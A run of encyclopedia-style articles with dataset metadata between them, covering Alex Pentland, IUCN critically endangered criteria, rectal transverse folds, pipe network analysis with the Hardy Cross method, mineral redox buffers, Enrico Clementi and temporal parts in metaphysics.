Alex Paul "Sandy" Pentland (born 1951) is an American computer scientist, HAI Fellow at Stanford, Toshiba Professor at MIT, and serial entrepreneur. Education Pentland received his bachelor's degree from the University of Michigan and obtained his Ph.D. from Massachusetts Institute of Technology in 1982. Career Pentland started as a lecturer at Stanford University in both computer science and psychology, and joined the MIT faculty in 1986, where he became Academic Head of the Media Laboratory and received the Toshiba Chair in Media Arts and Sciences, later joined the faculty of the MIT School of Engineering and the MIT Sloan School, and recently became HAI Fellow at Stanford. He serves on the Board of the UN Global Partnership for Sustainable Development Data, advisory boards of Consumers Union, OECD and the Abu Dhabi Investment Authority Lab, and formerly of the American Bar Association, AT&T, and several of the startup companies he has co-founded. He previously co-founded and co-directed the Media Lab Asia laboratories at the Indian Institutes of Technology and Strong Hospital's Center for Future Health. Pentland is one of the most cited authors in computer science with an h-index of 155, is a member of the U.S. National Academy of Engineering, co-led the World Economic Forum discussion in Davos that led to the EU privacy regulation GDPR, and was one of the UN Secretary General's "Data Revolutionaries" that helped forge the transparency and accountability mechanisms in the UN's Sustainable Development Goals. Pentland founded MIT Connection Science an MIT-wide program which pioneered computational social science, using big data and AI to better understand human society, and the Trust::Data Alliance which is an alliance of companies and nations building open-source software that makes AI and data safe, trusted and secure. He also founded the MIT Media Lab Entrepreneurship Program which creates ventures to take cutting-edge technologies into the real world, was Academic Director of the Data-Pop Alliance, and co-founder of Imagination In Action which bring world-changing inventors together with leaders of governments and companies. In 2011 Tim O’Reilly named him one of the world's seven most powerful data scientists along with Larry Page, then CEO of Google and the CTO of the Department of Health and Human Services. Recent invited keynotes include annual meetings of U.S. National Academy of Engineering, OECD, G20, World Bank, and JP Morgan. Pentland's research focuses on next-gen Web infrastructure, AI, Computational Social Science, and Privacy. His research helps people better understand the "physics" of their social environment, and helps individuals, companies and communities to reinvent themselves to be safer, more productive, and more creative. He has previously been a pioneer in wearable computing, ventures technology for developing nations, and image understanding. His research has been featured in Nature, Science, and Harvard Business Review, as well as being the focus of TV features on BBC World, Discover and Science channels. Companies co-founded or incubated by Pentland's lab include the largest rural health care service delivery system in the world, the advertising arm of Alibaba, the identity authentication technology that powers India's digital identity system Aadhaar, and rural service outlets for India's largest payment solutions provider. 
More recent companies include Ginger.io (mental health services), CogitoCorp.com (AI coaching for interaction management), SCRT.network (Web3 confidential smart contracts), Wise Systems (delivery planning and optimization), Sila Money (stable bank and stablecoin), Akoya (secure, privacy-preserving financial interactions), FortifID (digital identity), Metha.ai (microbiome interventions for GHG reduction and health), and Array Insights (federated medical data analytics). Pentland, along with colleagues William J. Mitchell and Kent Larson at the Massachusetts Institute of Technology, is credited with first exploring the concept of a living laboratory. They argued that a living lab represents a user-centric research methodology for sensing, prototyping, validating and refining complex solutions in multiple and evolving real-life contexts. Nowadays, several living lab descriptions and definitions are available from different sources. Publications Honest Signals (2010) describes research chosen as the Harvard Business Review Breakthrough Idea of the Year. Social Physics (2015) describes research that won both the McKinsey Award from Harvard Business Review and the 40th Anniversary of the Internet Grand Challenge. References External links MIT Home Page and link to MIT Human Dynamics research group Reporting on Pentland's research (video) 1952 births Living people University of Michigan alumni Massachusetts Institute of Technology alumni American computer scientists Stanford University School of Engineering faculty MIT School of Engineering faculty Ubiquitous computing researchers Stanford University Department of Psychology faculty MIT Media Lab people New England Complex Systems Institute MIT Sloan School of Management faculty Government by algorithm
Alex Pentland
[ "Engineering" ]
985
[ "Government by algorithm", "Automation" ]
7,451,605
https://en.wikipedia.org/wiki/Critically%20endangered
An IUCN Red List critically endangered (CR or sometimes CE) species is one that has been categorized by the International Union for Conservation of Nature as facing an extremely high risk of extinction in the wild. As of December 2023, of the 157,190 species currently on the IUCN Red List, 9,760 are listed as critically endangered, with 1,302 being possibly extinct and 67 possibly extinct in the wild. The IUCN Red List provides the public with information regarding the conservation status of animal, fungi, and plant species. It divides various species into seven different categories of conservation based on geographic range, population size, habitat, threats, etc. Each category represents a different level of global extinction risk. Species that are considered to be critically endangered are placed within the "Threatened" category. As the IUCN Red List does not consider a species extinct until extensive targeted surveys have been conducted, species that are possibly extinct are still listed as critically endangered. IUCN maintains a list of "possibly extinct" and "possibly extinct in the wild" species, modelled on categories used by BirdLife International to categorize these taxa. Criteria To be defined as critically endangered in the Red List, a species must meet any of the following criteria (A–E) ("3G/10Y" signifies three generations or ten years—whichever is longer—over a maximum of 100 years; "MI" signifies Mature Individuals): A: Population Size Reduction The rate of reduction is measured over either a 10-year span or three generations of the species. The cause of this decline must also be known. If the reasons for the population reduction no longer occur and can be reversed, the population needs to have been reduced by at least 90%. If not, then the population needs to have been reduced by at least 80%. B: Restricted Geographic Range The extent of occurrence is less than 100 km² OR the area of occupancy is less than 10 km², together with at least two of the following: severe habitat fragmentation or existence at just one location; decline in extent of occurrence, area of occupancy, area/extent/quality of habitat, number of locations/subpopulations, or amount of MI; or extreme fluctuations in extent of occurrence, area of occupancy, number of locations/subpopulations, or amount of MI. C: Small Population Size and Decline The population must number fewer than 250 MI and show either: an estimated continuing decline of at least 25% within three years or one generation; or a continuing decline together with extreme fluctuations, or over 90% of MI in a single subpopulation, or no more than 50 MI in any one subpopulation. D: Very Small Population Size The population must number fewer than 50 MI. E: Probability of Extinction There must be at least a 50% probability of going extinct in the wild within 3G/10Y. (A simplified encoding of these thresholds appears in the code sketch following this article.) Causes The current extinction crisis is witnessing extinction rates far above the natural background rate of extinction. It has largely been credited to human impacts on climate change and the loss of biodiversity, along with natural forces that may create stress on a species or cause a population to become extinct. Currently the biggest driver of species extinction is human interaction resulting in habitat loss. Species rely on their habitat for the resources needed for their survival. If the habitat is destroyed, the population will see a decline in its numbers. Activities that cause loss of habitat include pollution, urbanization, and agriculture.
Another reason for plants and animals to become endangered is the introduction of invasive species. An invasive species invades and exploits a new habitat, outcompeting the native organisms for its natural resources and eventually taking over the habitat. This can lead either to the native species' extinction or to their becoming endangered, which may eventually end in extinction as well. Plants and animals may also go extinct due to disease. The introduction of a disease into a new habitat can cause it to spread among the native species. Having little familiarity with, and little resistance to, the disease, the native species can die off. References IUCN Red List Biota by conservation status
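To restate the Criteria section above in executable form, here is a deliberately simplified sketch (Python). It encodes only the headline thresholds as summarized in this article (the full IUCN rules carry many qualifiers the summary glosses over, and criterion B's geographic-range test is omitted), and every argument name is invented for illustration.

```python
# Simplified restatement of the CR thresholds summarized above. This is an
# illustration of the article's summary, not the full IUCN assessment rules.
def meets_cr_criteria(reduction_pct=None, causes_reversible_and_ceased=False,
                      mature_individuals=None, decline_observed=False,
                      extinction_probability=None):
    # A: population reduction (>=90% if causes are reversible, understood
    #    and ceased, otherwise >=80%), over 10 years or three generations.
    if reduction_pct is not None:
        threshold = 90.0 if causes_reversible_and_ceased else 80.0
        if reduction_pct >= threshold:
            return True
    # C: fewer than 250 mature individuals with a continuing decline.
    if (mature_individuals is not None and mature_individuals < 250
            and decline_observed):
        return True
    # D: fewer than 50 mature individuals, regardless of trend.
    if mature_individuals is not None and mature_individuals < 50:
        return True
    # E: >=50% modelled probability of extinction within 3G/10Y.
    if extinction_probability is not None and extinction_probability >= 0.5:
        return True
    return False   # (criterion B, the geographic-range test, is omitted)

print(meets_cr_criteria(mature_individuals=40))   # True via criterion D
print(meets_cr_criteria(reduction_pct=85.0))      # True via criterion A
```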
Critically endangered
[ "Biology" ]
823
[ "Biota by conservation status", "Biodiversity" ]
7,451,826
https://en.wikipedia.org/wiki/Transverse%20folds%20of%20rectum
The transverse folds of rectum (or Houston's valves or the valves of Houston) are semi-lunar transverse folds of the rectal wall that protrude into the rectum, not the anal canal, which lies below the rectum. Their use seems to be to support the weight of fecal matter and prevent its urging toward the anus, which would produce a strong urge to defecate. Although the term rectum means straight, these transverse folds overlap each other during the empty state of the intestine to such an extent that, as Houston remarked, they require considerable maneuvering to conduct an instrument along the canal, as often occurs in sigmoidoscopy and colonoscopy. These folds are about 12 mm in width and are composed of the circular muscle coat of the rectum. They are usually three in number; sometimes a fourth is found, and occasionally only two are present. One is situated near the commencement of the rectum, on the right side. A second extends inward from the left side of the tube, opposite the middle of the sacrum. A third, the largest and most constant, projects backward from the forepart of the rectum, opposite the fundus of the urinary bladder. When a fourth is present, it is situated nearly 2.5 cm above the anus on the left and posterior wall of the tube. Transverse folds were first described by the Irish anatomist John Houston, curator of the Royal College of Surgeons in Ireland Museum, in 1830. They appear to be peculiar to human physiology: Baur (1863) looked for Houston's valves in a number of mammals, including wolf, bear, rhinoceros, and several Old World primates, but found no evidence of them. They are formed very early during human development, and may be visible in embryos of as little as 55 mm in length (10 weeks of gestational age). External links References Digestive system Rectum
Transverse folds of rectum
[ "Biology" ]
404
[ "Digestive system", "Organ systems" ]
7,451,902
https://en.wikipedia.org/wiki/Pipe%20network%20analysis
In fluid dynamics, pipe network analysis is the analysis of fluid flow through a hydraulic network containing several or many interconnected branches. The aim is to determine the flow rates and pressure drops in the individual sections of the network. This is a common problem in hydraulic design. Description To direct water to many users, municipal water supplies often route it through a water supply network. A major part of this network will consist of interconnected pipes. This network creates a special class of problems in hydraulic design, with solution methods typically referred to as pipe network analysis. Water utilities generally make use of specialized software to automatically solve these problems. However, many such problems can also be addressed with simpler methods, like a spreadsheet equipped with a solver or a modern graphing calculator. Deterministic network analysis Once the friction factors of the pipes are obtained (or calculated from pipe friction laws such as the Darcy–Weisbach equation), we can consider how to calculate the flow rates and head losses on the network. Generally the head losses (potential differences) at each node are neglected, and a solution is sought for the steady-state flows on the network, taking into account the pipe specifications (lengths and diameters), pipe friction properties, and known flow rates or head losses. The steady-state flows on the network must satisfy two conditions: (1) At any junction, the total flow into the junction equals the total flow out of it (law of conservation of mass, or continuity law, or Kirchhoff's first law). (2) Between any two junctions, the head loss is independent of the path taken (law of conservation of energy, or Kirchhoff's second law); this is equivalent mathematically to the statement that on any closed loop in the network, the head loss around the loop must vanish. If there are sufficient known flow rates, so that the system of equations given by (1) and (2) above is closed (number of unknowns = number of equations), then a deterministic solution can be obtained. The classical approach for solving these networks is to use the Hardy Cross method. In this formulation, one first creates guess values for the flows in the network, expressed as volumetric flow rates Q. The initial guesses must satisfy the continuity condition (1); that is, if Q7 enters a junction and Q6 and Q4 leave the same junction, then the initial guess must satisfy Q7 = Q6 + Q4. After the initial guess is made, a loop is considered so that the second condition can be evaluated. Given a starting node, we work our way around the loop in a clockwise fashion, as illustrated by Loop 1. We add up the head losses according to the Darcy–Weisbach equation for each pipe whose flow Q is in the same direction as our loop (like Q1), and subtract the head loss if the flow is in the reverse direction (like Q4). In other words, we add the head losses around the loop in the direction of the loop; depending on whether the flow is with or against the loop, some pipes will have head losses and some will have head gains (negative losses). To satisfy the loop condition (2), the sum about each loop should be 0 at the steady-state solution. If the actual sum of the head losses is not equal to 0, then all the flows in the loop are adjusted by an amount given by the following formula, where a positive adjustment is in the clockwise direction: \Delta Q = -\frac{\sum_c h_c - \sum_{cc} h_{cc}}{n \sum_c |h_c / Q_c| + n \sum_{cc} |h_{cc} / Q_{cc}|} where h denotes the head loss of a pipe at its current flow Q, n is 1.85 for Hazen–Williams, and n is 2 for Darcy–Weisbach. The clockwise specifier (c) means only the flows that are moving clockwise in the loop, while the counter-clockwise specifier (cc) means only the flows that are moving counter-clockwise.
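A minimal Python sketch of this iterative correction follows, assuming the Darcy–Weisbach form of head loss h = r·Q·|Q| (so n = 2) on a hypothetical five-pipe, two-loop network; the pipe resistances, loop definitions, and initial flows are illustrative inventions, not a standard benchmark.

```python
# Hardy Cross sketch with head loss h = r * Q * |Q| (Darcy-Weisbach, n = 2).
# Hypothetical network: 100 flow units enter at node A and leave at node D.
# Pipes 0..4 have assumed directions A->B, A->C, B->D, C->D, B->C.
# Each loop lists (pipe index, +1 if the pipe's assumed direction runs
# clockwise around that loop, -1 otherwise). All numbers are illustrative.

def hardy_cross(Q, r, loops, n=2, tol=1e-8, max_iter=100):
    """Correct flows Q (which must already satisfy junction continuity)."""
    for _ in range(max_iter):
        worst = 0.0
        for loop in loops:
            # Signed head losses and derivative d|h|/dQ = n * r * |Q|^(n-1)
            h_sum = sum(s * r[i] * Q[i] * abs(Q[i]) ** (n - 1) for i, s in loop)
            d_sum = sum(n * r[i] * abs(Q[i]) ** (n - 1) for i, _ in loop)
            dQ = -h_sum / d_sum              # positive correction is clockwise
            for i, s in loop:
                Q[i] += s * dQ               # loop update preserves continuity
            worst = max(worst, abs(dQ))
        if worst < tol:
            break
    return Q

Q = [50.0, 50.0, 30.0, 70.0, 20.0]           # initial guesses satisfying continuity
r = [1.0, 2.0, 3.0, 1.5, 2.5]                # illustrative resistance coefficients
loops = [[(0, +1), (4, +1), (1, -1)],        # loop A-B-C-A
         [(2, +1), (3, -1), (4, -1)]]        # loop B-D-C-B (shares pipe 4)
print([round(q, 3) for q in hardy_cross(Q, r, loops)])
```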
This adjustment does not solve the whole problem on its own, since most networks have several loops. It is safe to apply, however, because the flow changes do not alter condition (1), so the other loops still satisfy it; the results from the first loop should nevertheless be used before progressing to other loops. An adaptation of this method is needed to account for water reservoirs attached to the network, which are joined in pairs by the use of 'pseudo-loops' in the Hardy Cross scheme; this is discussed further in the Hardy Cross method article. The modern method is simply to create a set of conditions from the above Kirchhoff laws (junction and head-loss criteria) and then use a root-finding algorithm to find Q values that satisfy all the equations. The literal friction loss equations use a Q² term, but we want to preserve any changes in direction. Create a separate equation for each loop in which the head losses are added up, but instead of squaring Q, use |Q|·Q (with |Q| the absolute value of Q), so that any sign changes reflect appropriately in the resulting head-loss calculation.
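A sketch of this residual formulation for the same hypothetical network as above, handing junction-continuity and loop equations to a general-purpose root finder; SciPy's fsolve is used here purely for illustration, and the node and loop equations are assumptions matching the made-up network, not a standard test case.

```python
# "Modern" formulation sketch: assemble junction-continuity and loop
# residuals (using r * Q * |Q| to preserve flow direction) and hand them
# to a general root finder. Network data are illustrative, as above.
import numpy as np
from scipy.optimize import fsolve

r = np.array([1.0, 2.0, 3.0, 1.5, 2.5])      # pipe resistance coefficients

def residuals(Q):
    h = r * Q * np.abs(Q)                     # |Q|*Q keeps the sign of each head loss
    return [
        Q[0] - Q[2] - Q[4],                   # continuity at node B
        Q[1] + Q[4] - Q[3],                   # continuity at node C
        Q[2] + Q[3] - 100.0,                  # continuity at node D (total demand)
        h[0] + h[4] - h[1],                   # zero net head loss around loop A-B-C-A
        h[2] - h[3] - h[4],                   # zero net head loss around loop B-D-C-B
    ]

Q = fsolve(residuals, [50.0, 50.0, 30.0, 70.0, 20.0])
print(np.round(Q, 3))
```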
Colebrook, "Turbulent flow in pipes, with particular reference to the transition region between smooth and rough pipe laws," Jour. Ist. Civil Engrs., London (Feb. 1939). Eusuff, Muzaffar M.; Lansey, Kevin E. (2003). "Optimization of Water Distribution Network Design Using the Shuffled Frog Leaping Algorithm". Journal of Water Resources Planning and Management. 129 (3): 210-225. Fluid dynamics Hydraulics Hydraulic engineering Networks Piping
Pipe network analysis
[ "Physics", "Chemistry", "Engineering", "Environmental_science" ]
1,571
[ "Hydrology", "Building engineering", "Chemical engineering", "Physical systems", "Hydraulics", "Civil engineering", "Mechanical engineering", "Piping", "Hydraulic engineering", "Fluid dynamics" ]
7,451,913
https://en.wikipedia.org/wiki/Mineral%20redox%20buffer
In geology, a redox buffer is an assemblage of minerals or compounds that constrains oxygen fugacity as a function of temperature. Knowledge of the redox conditions (or, equivalently, oxygen fugacities) at which a rock forms and evolves can be important for interpreting the rock's history. Iron, sulfur, and manganese are three of the relatively abundant elements in the Earth's crust that occur in more than one oxidation state. For instance, iron, the fourth most abundant element in the crust, exists as native iron, ferrous iron (Fe2+), and ferric iron (Fe3+). The redox state of a rock affects the relative proportions of the oxidation states of these elements and hence may determine both the minerals present and their compositions. If a rock contains pure minerals that constitute a redox buffer, then the oxygen fugacity of equilibration is defined by one of the curves in the accompanying fugacity-temperature diagram. Common redox buffers and mineralogy Redox buffers were developed in part to control oxygen fugacities in laboratory experiments to investigate mineral stabilities and rock histories. Each of the curves plotted in the fugacity-temperature diagram is for an oxidation reaction occurring in a buffer. These redox buffers are listed here in order of decreasing oxygen fugacity at a given temperature, in other words from more oxidizing to more reducing conditions in the plotted temperature range. As long as all the pure minerals (or compounds) are present in a buffer assemblage, the oxidizing conditions are fixed on the curve for that buffer. Pressure has only a minor influence on these buffer curves for conditions in the Earth's crust. MH: magnetite-hematite: 4 Fe3O4 + O2 ⇌ 6 Fe2O3 NiNiO: nickel-nickel oxide: 2 Ni + O2 ⇌ 2 NiO FMQ: fayalite-magnetite-quartz: 3 Fe2SiO4 + O2 ⇌ 2 Fe3O4 + 3 SiO2 WM: wüstite-magnetite: 6 Fe1−xO + O2 ⇌ 2 Fe3O4 (approximate, as wüstite is nonstoichiometric) IW: iron-wüstite: 2 (1−x) Fe + O2 ⇌ 2 Fe1−xO QIF: quartz-iron-fayalite: 2 Fe + SiO2 + O2 ⇌ Fe2SiO4
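Buffer curves of this kind are commonly parameterized as log10 fO2 = A/T + B + C(P − 1)/T, with T in kelvin and P in bars. A minimal Python sketch for the FMQ buffer follows; the constants are taken from one widely cited calibration (Frost, 1991) and are assumptions for illustration here, not values given in this article.

```python
# Sketch: buffer curves are often parameterized as
#   log10 fO2 = A/T + B + C*(P - 1)/T   (T in kelvin, P in bars).
# The FMQ constants below follow a commonly cited calibration (Frost, 1991);
# treat them as illustrative assumptions, not values from this article.
A, B, C = -25096.3, 8.735, 0.110

def log_fo2_fmq(t_kelvin, p_bar=1.0):
    """log10 of oxygen fugacity on the FMQ buffer at T (K) and P (bar)."""
    return A / t_kelvin + B + C * (p_bar - 1.0) / t_kelvin

for t_c in (600, 800, 1000, 1200):
    print(f"{t_c:4d} degC: log10 fO2(FMQ) = {log_fo2_fmq(t_c + 273.15):7.2f}")
```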
Minerals, rock types, and characteristic buffers Mineralogy and correlations with redox buffer The ratio of Fe2+ to Fe3+ within a rock determines, in part, the silicate mineral and oxide mineral assemblage of the rock. Within a rock of a given chemical composition, iron enters minerals based on the bulk chemical composition and the mineral phases that are stable at that temperature and pressure. For instance, at redox conditions more oxidizing than the MH (magnetite-hematite) buffer, much of the iron is likely to be present as Fe3+, and hematite is a likely mineral in iron-bearing rocks. Iron may only enter minerals such as olivine if it is present as Fe2+; Fe3+ cannot enter the lattice of fayalite olivine. Elements in olivine such as magnesium, however, stabilize olivine containing Fe2+ to conditions more oxidizing than those required for fayalite stability. Solid solution between magnetite and the titanium-bearing endmember, ulvospinel, enlarges the stability field of magnetite. Likewise, at conditions more reducing than the IW (iron-wüstite) buffer, minerals such as pyroxene can still contain Fe3+. The redox buffers therefore are only approximate guides to the proportions of Fe2+ and Fe3+ in minerals and rocks. Igneous rocks Terrestrial igneous rocks commonly record crystallization at oxygen fugacities more oxidizing than the WM (wüstite-magnetite) buffer and more reducing than a log unit or so above the nickel-nickel oxide (NiNiO) buffer. Their oxidizing conditions thus are not far from those of the FMQ (fayalite-magnetite-quartz) redox buffer. Nonetheless, there are systematic differences that correlate with tectonic setting. Igneous rocks emplaced and erupted in island arcs typically record oxygen fugacities 1 or more log units more oxidizing than those of the NiNiO buffer. In contrast, basalt and gabbro in non-arc settings typically record oxygen fugacities from about those of the FMQ buffer to a log unit or so more reducing than that buffer. Sedimentary rocks Oxidizing conditions are common in some environments of deposition and diagenesis of sedimentary rocks. The fugacity of oxygen at the MH buffer (magnetite-hematite) is only about 10⁻⁷⁰ at 25 °C, but it is about 0.2 atmospheres in the Earth's atmosphere, so some sedimentary environments are far more oxidizing than those in magmas. Other sedimentary environments, such as the environments for formation of black shale, are relatively reducing. Metamorphic rocks Oxygen fugacities during metamorphism extend to higher values than those in magmatic environments, because of the more oxidizing compositions inherited from some sedimentary rocks. Nearly pure hematite is present in some metamorphosed banded iron formations. In contrast, native nickel-iron is present in some serpentinites. Extraterrestrial rocks Within meteorites, the iron-wüstite redox buffer may be more appropriate for describing the oxygen fugacity of these extraterrestrial systems. Redox effects and sulfur Sulfide minerals such as pyrite (FeS2) and pyrrhotite (Fe1−xS) occur in many ore deposits. Pyrite and its polymorph marcasite also are important in many coal deposits and shales. These sulfide minerals form in environments more reducing than that of the Earth's surface. When in contact with oxidizing surface waters, sulfides react: sulfate (SO42−) forms, and the water becomes acidic and charged with a variety of elements, some potentially toxic. Consequences can be environmentally harmful, as discussed in the entry for acid mine drainage. Sulfur oxidation to sulfate or sulfur dioxide also is important in generating sulfur-rich volcanic eruptions, like those of Pinatubo in 1991 and El Chichón in 1982. These eruptions contributed unusually large quantities of sulfur dioxide to the Earth's atmosphere, with consequent effects on atmospheric quality and on climate. The magmas were unusually oxidizing, almost two log units more so than the NiNiO buffer. The calcium sulfate mineral anhydrite was present as phenocrysts in the erupted tephra. In contrast, sulfides contain most of the sulfur in magmas more reducing than the FMQ buffer. See also Ellingham diagram Normative mineralogy References Further reading Inorganic chemistry Igneous rocks Petrology Geochemistry
Mineral redox buffer
[ "Chemistry" ]
1,465
[ "nan" ]
7,452,269
https://en.wikipedia.org/wiki/Enrico%20Clementi
Enrico Clementi (November 19, 1931, Cembra, Italy – March 30, 2021) was an Italian chemist, a pioneer in computational techniques for quantum chemistry and molecular dynamics. Clementi received his Ph.D. in Chemistry from the University of Pavia, where he was a student in the Collegio Cairoli, in 1954, and joined IBM Research in 1961. At IBM he was first responsible for atomic calculations, then manager of a scientific computation department until 1974. As an IBM Fellow (elected 1969), he led research and development in parallel computer architecture and fundamental research in chemistry, biophysics and fluid dynamics. In 1991 he retired from IBM to join the Université Louis Pasteur in Strasbourg, France, as Professor of Chemistry from 1992 until 2000. Clementi's work was recognized by awards and honours: IBM Fellow (1969), Fellow of the American Physical Society (1984), President of the International Society of Quantum Biology, the Alexander von Humboldt award (2001), and membership of the International Academy of Quantum Molecular Science. Selected publications E. Clementi, "Tables of Atomic Functions", IBM Journal of Research and Development, Special Supplement, Vol. 9, No. 1, 1965 E. Clementi and C. Roetti, "Tables of Roothaan-Hartree-Fock Wavefunctions", Special Issue in Atomic Data and Nuclear Data Tables, Academic Press, New York, 1974 Books Enrico Clementi: "Tables of Atomic Functions", International Business Machines Corp. (1965). Enrico Clementi, Carla Roetti: "Atomic Data and Nuclear Data Tables", Academic Press, 1st ed. (1974). Enrico Clementi: "Roothaan-Hartree-Fock Atomic Wavefunctions: Basis Functions and Their Coefficients for Ground and Certain Excited States of Neutral and Ionized Atoms, Z<54", Academic Press (1974). Enrico Clementi: "Determination of Liquid Water Structure: Coordination Numbers for Ions and Solvation for Biological Molecules" (Lecture Notes in Chemistry 2), Springer-Verlag (1976). Enrico Clementi: "Computational Aspects for Large Chemical Systems", Lecture Notes in Chemistry No. 19, Springer-Verlag (1980). Enrico Clementi (Ed.), Ramaswamy H. Sarma (Ed.): "Structure and Dynamics: Nucleic Acids and Proteins; La Jolla Symposium Proceedings, 1982", Proceedings of the International Symposium on Structure and Dynamics of Nucleic Acids and Proteins, Adenine Press (1983). Enrico Clementi: "Biological and Artificial Intelligence Systems", Springer, 1st ed. (Sep. 30, 1988). E. Clementi (Ed.): "Modern Techniques in Computational Chemistry: MOTECC-89", Springer (1989). E. Clementi (Ed.): "Modern Techniques in Computational Chemistry: MOTECC-90", Springer (1990). E. Clementi (Ed.): "Modern Techniques in Computational Chemistry: MOTECC-91", Springer (1991). Enrico Clementi (Ed.): "Methods and Techniques in Computational Chemistry: METECC-94, Volume C: Structure and Dynamics", STEF (1993). Enrico Clementi (Ed.), Giorgina Corongiu (Ed.): "Methods and Techniques in Computational Chemistry: METECC-95", STEF, Cagliari (1995). Jean-Marie Andre, David H. Mosley, Marie-Claude Andre, Benoit Champagne, Enrico Clementi, Joseph G. Fripiat, Laurence Leherte, Lorenzo Pisani, Daniel P. Vercauteren, Marjan Vracko: "Exploring Aspects of Computational Chemistry" (in French), Presses Universitaires de Namur (1997). Enrico Clementi (Ed.), Jean-Marie André (Ed.), J. Andrew McCammon (Ed.): "Theory and Applications in Computational Chemistry: The First Decade of the Second Millennium: International Congress TACC-2012 (AIP Conference Proceedings)", American Institute of Physics (Aug. 29, 2012).
References External links Bio at IAQMS Computer del futuro. Conversazione con Enrico Clementi (interview film, 1987, at IBM Kingston) Enrico Clementi: Produced by Quantum Theory Project, Dept. Chem. and Phys., Univ. Florida 1931 births 2021 deaths People from Trentino IBM Fellows Members of the International Academy of Quantum Molecular Science Theoretical chemists Italian chemists Computational chemists Fellows of the American Physical Society
Enrico Clementi
[ "Chemistry" ]
958
[ "Quantum chemistry", "Physical chemists", "Computational chemists", "Theoretical chemistry", "Computational chemistry", "Theoretical chemists" ]
7,453,251
https://en.wikipedia.org/wiki/Temporal%20parts
In contemporary metaphysics, temporal parts are the parts of an object that exist in time. A temporal part would be something like "the first year of a person's life", or "all of a table from 10:00 a.m. on June 21, 1994 to 11:00 p.m. on July 23, 1996". The term is used in the debate over the persistence of material objects. Objects typically have parts that exist in space: a human body, for example, has spatial parts like hands, feet, and legs. Some metaphysicians believe objects have temporal parts as well. Originally it was argued that those who believe in temporal parts believe in perdurantism, the view that persisting objects are wholes composed entirely of temporal parts. This view was contrasted with endurantism, the claim that objects are wholly present at any one time (thus not having different temporal parts at different times). This claim is still commonplace, but philosophers like Ted Sider believe that even endurantists should accept temporal parts. Definition Not everyone was happy with the definition by analogy: some philosophers, such as Peter van Inwagen, argued that, even given the definition by analogy, they still had no real idea what a temporal part was meant to be, while others have felt that whether temporal parts exist or not is merely a verbal dispute (Eli Hirsch holds this view). Gallois surveys some of the attempts to create a more specific definition. The early attempts included identifying temporal parts with ordered pairs of times and objects; but while it seems relatively unproblematic that temporal parts exist given this definition, ordered pairs seem unsuitable to play the role that perdurantists demand, such as being parts of persisting wholes: how can a set be a part of a material object? Later perdurantists identified persisting objects with events, and since events' having temporal parts was not problematic (for example, the first and second halves of a football match), it was imagined that persisting objects could have temporal parts. There was a reluctance from many to identify objects with events, and this definition has long since fallen out of fashion. Of the definitions closest to those commonly used in the literature, the earliest was Thomson's: x is a cross-sectional temporal part of y =df (∃T)[y and x exist through T & no part of x exists outside T & (∀t)(t is in T ⊃ (∀P)(y exactly occupies P at t ⊃ x exactly occupies P at t))]. Later, Sider tried to combat the fears of endurantists who could not understand what a temporal part is by defining it in terms of "part at a time" or "parthood at a time", a relation that the endurantist should accept, unlike parthood simpliciter, which an endurantist may say makes no sense, given that all parts are had at a time. (However, McDaniel argues that even endurantists should accept that notion.) Sider gave the following definition, which is widely used: x is an instantaneous temporal part of y at instant t =df (i) x is a part of y; (ii) x exists at, but only at, t; and (iii) x overlaps every part of y that exists at t. Sider also gave an alternative definition that is compatible with presentism, using the tensed operators "WILL" and "WAS": x is an instantaneous temporal part of y =df (i) x is a part of y; (ii) x overlaps every part of y; (iii) it is not the case that WILL (x exists); (iv) it is not the case that WAS (x exists).
While Sider's definition is most commonly used, Zimmerman, troubled by the demand for instants (which may not exist in a gunky space-time, one in which every region has a sub-region), gives the following: x is a temporal part of y throughout T =df (i) x exists during and only during T; (ii) for every subinterval T* of T, there is a z such that (a) z is a part of x, and (b) for all u, u has a part in common with z during T* if and only if u has a part in common with y during T*; and (iii) y exists at times outside of T. The argument from temporary intrinsics Temporal parts are sometimes used to account for change. The problem of change is just that if an object x and an object y have different properties, then by Leibniz's Law one ought to conclude that they are different. For example, if a person changes from having long hair to short hair, then the temporal-parts theorist can say that change is the difference between the temporal parts of a temporally extended object (the person). So, the person changes by having a temporal part with long hair and a temporal part with short hair; the temporal parts are different, which is consistent with Leibniz's Law. However, those who reject the notion that ordinary objects, like people, have temporal parts usually adopt a more common-sense view. They say that an object has properties at times. In this view, the person changes by having long hair at t and short hair at t′. To them, there is no contradiction in thinking an object is capable of having different properties at different times. An argument widely held to favor temporal parts is David Lewis's argument from temporary intrinsics, which he first advanced in On the Plurality of Worlds. The outline of the argument is as follows: P1: There are intrinsic properties, i.e., properties had by an object independently of anything else in the world. P2: If every property had by an object is had to times, then there are no intrinsic properties. C1: Therefore, not every property had by an object is had to times. Objects have some of their properties intrinsically, i.e., simpliciter. P3: But only temporal parts can have their properties simpliciter. C2: Therefore, there are temporal parts. (For this to follow, it is required that there be objects.) Premise P1 is an intuitive premise; generally we distinguish between properties and relations. An intrinsic property is just a property that something has independently of anything else; an extrinsic property is had only in relation to something. An example of an extrinsic property is "fatherhood": something is a father only if that something is a male and has a child. An example of an alleged intrinsic property is "shape". According to Lewis, if we know what "shapes" are, we know them to be properties, not relations. However, if properties are had to times, as endurantists say, then no property is intrinsic. Even if a ball is round throughout its existence, the endurantist must say "for all times in which the ball exists, the ball is round, i.e., it is round at those times; it has the property 'being round at a time'." So, if all properties are had to times, then there are no intrinsic properties (premise P2). However, if we think that Lewis is right and some properties are intrinsic, then some properties are not had to times; they are had simpliciter (conclusion C1). It might be said that premise P3 is more controversial. For instance, suppose a timeless world is possible.
If that were so, then in that world, even if there were intrinsic properties, they would not be had by temporal parts, since by definition a timeless world has no temporal dimension, and therefore in such a world there cannot be temporal parts. However, our world is not timeless, and the possibility of timeless worlds is questionable, so it seems reasonable to think that in worlds with a temporal dimension, only temporal parts can have properties simpliciter. This is so because temporal parts exist only at an instant, and therefore it makes no sense to speak of them as having properties at a time. Temporal parts have properties, and have a temporal location. So if person A changes from having long hair to having short hair, then that can be paraphrased by saying that there is a temporal part of A that has long hair simpliciter and another that has short hair simpliciter, and the latter is after the former in the temporal sequence; that supports premise P3. Conclusion C2 follows, so long as one is not considering empty worlds (if such worlds are even possible). An empty world doesn't have objects that change by having a temporal part with a certain property and another temporal part with a certain other property. Premise P1, the key premise of the argument, can be coherently denied, even if the resulting view (the abandonment of intrinsic properties) is counterintuitive. There are, however, ways to support the argument if one accepts relationalism about space-time. See also Four-dimensionalism Mereological nihilism Mereology References Further reading Philosophical logic Mereology Concepts in metaphysics Identity (philosophy) Philosophy of time
Temporal parts
[ "Physics" ]
1,917
